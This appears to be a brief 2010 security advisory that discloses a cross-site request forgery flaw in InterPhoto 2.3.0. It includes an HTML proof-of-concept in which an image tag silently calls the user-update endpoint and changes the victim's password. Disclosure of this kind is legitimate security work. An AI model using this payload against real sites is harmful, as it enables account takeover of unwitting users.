InterPhoto 2.3.0 Cross-site Request Forgery

This site is soon to be deprecated by http://www.johnleitch.net

Sunday, July 11, 2010

InterPhoto 2.3.0 Cross-site Request Forgery

A cross-site request forgery vulnerability in InterPhoto 2.3.0 can be exploited to change a user's password.

PoC

<html>
    <body>
        <img src="http://localhost/interphoto/mydesk.edit.php?action=updateuser&password=newpassword&repassword=newpassword&email=a%40a.com&userfullname=&usercompany=&useraddress=&userpostcode=&usertel=&userfax=&useronline=&userwebsite=" />
    </body>
</html>